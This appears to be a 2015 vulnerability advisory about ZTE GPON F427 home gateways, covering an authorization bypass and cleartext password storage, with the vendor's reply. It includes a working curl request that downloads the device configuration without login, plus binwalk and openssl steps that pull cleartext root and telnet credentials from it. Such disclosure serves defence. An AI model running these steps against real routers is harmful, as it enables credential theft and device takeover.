exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZTE GPON F427 Authorization Bypass / Cleartext Password Storage

ZTE GPON F427 Authorization Bypass / Cleartext Password Storage
Posted Oct 5, 2015
Authored by Jerzy Patraszewski

ZTE GPON F427 and possibly the F460/F600 models suffer from authorization bypass and cleartext password storage vulnerabilities.

tags | exploit, vulnerability, bypass
SHA-256 | dc765368483788a306626f2ec3e734f37903e48b198f40d579a1f434fb88db43

ZTE GPON F427 Authorization Bypass / Cleartext Password Storage

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: ZTE GPON F427 and possibly F460/F600 - authorization bypass and cleartext password storage
Author: Jerzy Patraszewski
Date: 10 July 2015

Affected software :
===================
ZTE GPON: F427
Version: V3.0
Firmware Image: F460_IMS_V2.30.10P1T6_JS1208


Description :
=============
ZTE ZXHN F427/460/660 are family of home gateways in ZTE FTTH solutions. By using the GPON technology, ultra-broadband access is provided for home and SOHO users.
The F427 provides one EPON interface port, four Ethernet ports (RJ45), one Voice (RJ11) one USB 2.0 port and one Wi-Fi port 802.11b/g/n.

There is very limited information available on network, however it seems, that these models differ mainly in amount and type of interfaces.

http://enterprise.zte.com.cn/en/products/network_lnfrastructure/broadband_access/xpon_olt/201401/t20140109_416587.html


Vulnerability :
*****************

Authorization Bypass on Device Config Manager page :
===================================================

Vulnerable URLs:
http://[device IP address]/manager_dev_config_t.gch
http://[device IP address]/getpage.gch?pid=100

Exploit :

curl -s -k -X 'POST' -H 'Content-Type: multipart/form-data; boundary=Sm0q' --data-binary $'Sm0q\x0d\x0aContent-Disposition form-data;name=\"config\"\x0d\x0aSm0q\x0d\x0a' 'http://[device IP address]/getpage.gch?pid=100' -o config.bin


Please note :
=-----------=
There is no authorization on http://[device IP address]/manager_dev_config_t.gch and from this page it is possible to download device configuration.
Actually this is done by issuing POST HTTP request to http://[device IP address]/getpage.gch?pid=100 as depicted by sample exploit.

When combined with other vulnerabilities, it is possible to proceed with further attacks, effectively leading to full compromitation of affected device.
Based on firmware image version and available publically information, it is possible that the same issue exists in whole family of products (F460 and F660), however it should be verified, as researcher has only access to F427.


References :
============

[https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management]
[https://cwe.mitre.org/data/definitions/285.html]


===================================================
Clear text password storage :
===================================================

Using authorization bypass it is possible to retreive config.bin (configuration dump) from affected device. From downloaded file it is trivial to extract XML file with clear text credentials of device users including
Web Interface users and telnet users. Other information is also available.

Exploit :
Download config.bin using manager_dev_config_t.gch, next run binwalk software with extract option:

binwalk -e config.bin


This will extract ZLIB-compressed files. Using openssl command decompress zlib files. One of extracted files is an XML
with device configuration and cleartext usernames and passwords (including root).

openssl zlib -d < _config.bin.extracted/D8.zlib


Please note :
=-----------=
Based on firmware image version and available publically information, it is possible that the same issue exists in whole family of products (F460 and F660), however it should be verified, as researcher has only access to F427.


References :
============

https://cwe.mitre.org/data/definitions/312.html


Vendor response :
=================

PSIRT response:

- ---8<----
The vulns you found are known to us and to our product department, here are the countermeasures we take to deal with the vulnerabilities:
1.The WAN side HTTP port is disabled in the releases after July 2012;
2.Authorization bypass is fixed in newer versions after September 2014;
3.Password encryption is strengthened in versions to release.

Measures and situation regarding current on-line devices:
1.Actions like Version Upgrade or Disable-WAN-Port are recommended to relative operators;
2.Security hardening notices were released regarding current on-line devices;
3.Due to the large amount of shipment and the EOS devices, there will be unpatched devices online for years.
- ---8<----

and response to my request for providing updated firmware:
- ---8<----
We really want to help you to proceed your investigation but there are policies in the company and we can't just give you a firmware directly.
- ---8<----

till today I didn't received updated version


Contact :
=========

Jerzy[dot]Patraszewski[at]gmail[dot]com


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iEYEARECAAYFAlYOyRgACgkQfwHzWvyp4C+/jwCfSx3WV/xw4wU09yARSWgMwYf9
pUMAn0xjZKBxRqmLSwQVwLEhhW6OwR4m
=G3pk
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close